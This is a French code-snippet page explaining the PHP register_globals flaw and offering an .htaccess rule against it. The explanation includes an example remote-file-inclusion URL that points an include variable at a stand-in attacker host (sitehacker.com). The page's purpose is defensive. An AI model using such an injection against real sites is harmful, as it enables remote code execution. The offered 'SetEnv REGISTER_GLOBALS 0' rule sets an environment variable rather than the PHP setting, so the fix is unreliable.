Information sur le code source

Enregistré le 22 Juin 2008 - Vu 17915 fois

Code source zippé: télécharger le zip

Impression: imprimer le code

Sociale bookmarking:

Votre avis:

Ecrit par : admin

[66] sources en Apache voir

Description du code source

Informations sur le code source

Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme :
include($prefix_path . '/chemin_d_include.php');
Ainsi l'appel de l'url http://www.example.com/page.php?prefix_path=http://sitehacker.com/script.txt peut permettre de faire exécuter l'include externe http://sitehacker.com/script.txt/chemin_d_include.php.
La désactivation de cette option nécessite de contrôler tous le code pour toujours accéder aux variables avec les tableaux $_ENV, $_GET, $_POST, $_REQUEST, $_COOKIE et $_SERVER et non directement avec leur nom. Pour plus d'informations vous pouvez lire l'explication détaillée ici.
Pour éviter cette faille, il suffit de désactiver l'enregistrement global avec cette règle dans le fichier .htaccess.

Code Source

.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21


################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Protection contre les attaques de hacker avec register...   #
#                                                                              #
# URL            : /scripts66-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 22 Juin 2008                                                #
#                                                                              #
################################################################################

SetEnv REGISTER_GLOBALS 0

Commentaire [1]

AnaisJessy
le 04 Oct 2016 à 23:17:00

Merci beaucoup pour script, je suis éditrice d'un site internet et très souvent je me fait attaqué mon site web...

Ajouter un commentaire

	RSS snippets RSS commentaires * Email * Sécurité :
Attention: Les champs marqués d'une étoile * sont obligatoires

Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter